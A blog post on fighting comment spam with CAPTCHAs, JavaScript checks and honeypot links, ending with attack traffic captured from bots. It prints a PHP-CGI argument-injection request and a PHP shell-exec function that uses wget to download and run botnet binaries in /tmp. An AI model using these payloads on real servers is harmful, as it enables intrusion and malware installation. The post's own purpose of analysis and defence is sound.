Year of the spam

Google says it no longer needs CAPTCHAs. If I had an iframe on virtually every website on the web, I could probably claim the same. If that reach is a factor in the method they use, then Facebook could claim the same capability.


A CAPTCHA, of which reCAPTCHA is one implementation, is a system for preventing bots (automated scripts) from entering spam on your website. CAPTCHAs are usually found in web forms.

For example, when you add a comment on an article, you are presented with a little challenge that is simple for humans and hard for bots. If an automated script can't solve the challenge, it can't send you spam.

Spam can be one of the most annoying things on your website. It can even be harmful.

I used to have a website that accepted user comments. When it was still new, I monitored the comments and deleted spam regularly.

When I got a few users, I stopped monitoring. I built a small image generator to protect myself from spam, and forgot about it.

Six months later I received an alert from Google Webmaster Tools. My home-brewed captcha had been defeated. My website had become a dense concentration of porn, Viagra, and child porn keywords.

In a panic, I blocked all new comments. I couldn't filter out just the comments that were spam, so I deleted six months' worth of entries.

I modified my image generator and added a little more complexity to fight those bots. To my surprise, it took less than a minute for the new version to be defeated too. So naturally, comments were disabled for good.

When I started this blog, I didn't think twice about comments. I went straight to a third-party system: Disqus. I'm a programmer, however, so in time I decided to reinvent the wheel with my own commenting system.

One thing that most bots don't do is run JavaScript. Simply requiring JavaScript to submit a comment filtered out a large batch of spam bots. For those too tricky for me, I set up an easy switch to move any post back to Disqus.
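One way such a JavaScript requirement could work is sketched below in Python. This is not the code running on this blog; the function names and the "reverse the nonce" challenge are assumptions made up for illustration. The idea is that the server embeds a random nonce in the form, the page's JavaScript fills a hidden field with a value derived from it, and the server rejects any submission where that field is missing or wrong.

```python
import secrets


def issue_challenge() -> str:
    """Return a random nonce to embed in the comment form (hypothetical helper)."""
    return secrets.token_hex(8)


def expected_answer(nonce: str) -> str:
    """Value the page's JavaScript is assumed to compute: the nonce reversed."""
    return nonce[::-1]


def accept_submission(nonce: str, js_answer: str) -> bool:
    """Accept the comment only if the hidden field holds the expected value.

    A bot that posts the form without running JavaScript leaves the
    hidden field empty, so its submission is rejected here.
    """
    return bool(js_answer) and js_answer == expected_answer(nonce)
```

A bot that replays the raw form never computes the answer, while a browser does it in one line of script. Anything that actually executes JavaScript passes, which is why this only filters the lazy majority.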

Now that most if not all spam is blocked, it would be a shame to just let it go to waste. So since January of 2014, I have been saving every spam entry for further study. I am shocked by how much data I have gathered.

No, I don't mark every comment I disagree with as spam. I log all the POST requests that are sent to fake links I generated. So far, I have:

The URLs are simple MD5 hashes made from some of the post information. You can download them below if you want a nice little IP blacklist.

Download File
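The fake-link trap can be sketched roughly as follows, in Python. Which post fields go into the hash is not stated above, so the `post_id` and `slug` inputs, the function names, and the in-memory sets are all assumptions for illustration.

```python
import hashlib


def trap_path(post_id: int, slug: str) -> str:
    """Build a fake URL path from an MD5 hash of some post information.

    The choice of fields (post_id and slug) is an assumption.
    """
    digest = hashlib.md5(f"{post_id}:{slug}".encode("utf-8")).hexdigest()
    return "/" + digest


def record_hit(method: str, path: str, ip: str, traps: set, blacklist: set) -> bool:
    """Blacklist the sender's IP when a POST arrives at a trap URL.

    Returns True if the request was a trap hit, False otherwise.
    """
    if method == "POST" and path in traps:
        blacklist.add(ip)
        return True
    return False
```

No human ever sees or submits to these URLs, so anything that POSTs to one is almost certainly a script that scraped the page.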

This is by no means full protection against spammers; a captcha would work better. But it is interesting to note that most bots fail a simple JavaScript test.

Some spammers are real people who try to sneak some stuff in manually. But those are easier to handle because they can only do so much.

I go through the trouble of approving each comment before it becomes permanent. And once I mark one as spam, its IP address is automatically flagged from then on.
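As a rough sketch of that approve-or-flag workflow, here is a small in-memory queue in Python. The class and method names are hypothetical, and rejecting flagged IPs outright is an assumption; the real system may only hold them for review.

```python
from dataclasses import dataclass, field


@dataclass
class ModerationQueue:
    """Hypothetical in-memory moderation queue for comments."""
    flagged_ips: set = field(default_factory=set)
    pending: dict = field(default_factory=dict)
    published: list = field(default_factory=list)
    next_id: int = 1

    def submit(self, ip: str, text: str):
        """Queue a comment for review; return None if the IP is flagged."""
        if ip in self.flagged_ips:
            return None  # assumption: flagged IPs are rejected outright
        comment_id = self.next_id
        self.next_id += 1
        self.pending[comment_id] = (ip, text)
        return comment_id

    def approve(self, comment_id: int) -> None:
        """Make a pending comment permanent."""
        _ip, text = self.pending.pop(comment_id)
        self.published.append(text)

    def mark_spam(self, comment_id: int) -> None:
        """Discard a pending comment and flag its IP for the future."""
        ip, _text = self.pending.pop(comment_id)
        self.flagged_ips.add(ip)
```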

What's in the data I collected

You can download the data in SQL format below, so I won't be talking about all the Viagra and Cialis here. What interested me the most is the other data that came along with it.

Download File

Here is one example:


After unescaping it with unescape(urlstring), this is what you get:

/cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

Variations of this appear throughout the list of requests. They target bugs in different versions of PHP, WordPress, and many other frameworks.
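To sift requests like this out of a log, a rough Python sketch is shown below. The `sample` string is my own shortened re-encoding of part of the decoded request above, not the captured original, and the list of directive names and the function name are assumptions chosen for illustration.

```python
from urllib.parse import unquote_plus

# php.ini directives that show up in the decoded request above.
SUSPICIOUS_DIRECTIVES = (
    "allow_url_include",
    "auto_prepend_file",
    "disable_functions",
    "safe_mode",
)


def looks_like_php_cgi_injection(raw_request: str) -> bool:
    """Decode a logged request and check for '-d directive=...' arguments."""
    decoded = unquote_plus(raw_request)
    return "-d " in decoded and any(
        name in decoded for name in SUSPICIOUS_DIRECTIVES
    )


# Illustrative sample only: a shortened, re-encoded fragment.
sample = (
    "/cgi-bin/php?%2Dd+allow_url_include%3Don"
    "+%2Dd+auto_prepend_file%3Dphp%3A%2F%2Finput+%2Dn"
)
print(unquote_plus(sample))
# /cgi-bin/php?-d allow_url_include=on -d auto_prepend_file=php://input -n
```

A substring check like this is crude and easy to evade, but it is enough to separate this family of probes from ordinary comment spam when browsing the logs.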

Other ones came with more familiar data:

$disablefunc_] =>  @ini_get("disable_functions");
if (!empty($disablefunc))
 $disablefunc = str_replace(" ","",$disablefunc);
 $disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
 global $disablefunc;
 $result = "";
 if (!empty($cmd))
  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== FALSE) {}
  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_resource($fp = popen($cmd,"r")))
   $result = "";
   while(!feof($fp)) {$result .= fread($fp,1024);}
 return $result;
myshellexec("rm -rf /tmp/armeabi;wget -P /tmp;chmod  x /tmp/armeabi");
myshellexec("rm -rf /tmp/arm;wget -P /tmp;chmod  x /tmp/arm");
myshellexec("rm -rf /tmp/ppc;wget -P /tmp;chmod  x /tmp/ppc");
myshellexec("rm -rf /tmp/mips;wget -P /tmp;chmod  x /tmp/mips");
myshellexec("rm -rf /tmp/mipsel;wget -P /tmp;chmod  x /tmp/mipsel");
myshellexec("rm -rf /tmp/x86;wget -P /tmp;chmod  x /tmp/x86");
myshellexec("rm -rf /tmp/nodes;wget -P /tmp;chmod  x /tmp/nodes");
myshellexec("rm -rf /tmp/sig;wget -P /tmp;chmod  x /tmp/sig");

I did very little testing, and the IP address times out when I try to access it through the browser. I will spend more time on it later.

This is why you have to make sure your server and applications are always up to date. These scripts go around the web testing old bugs on random servers.

There is something to learn here.
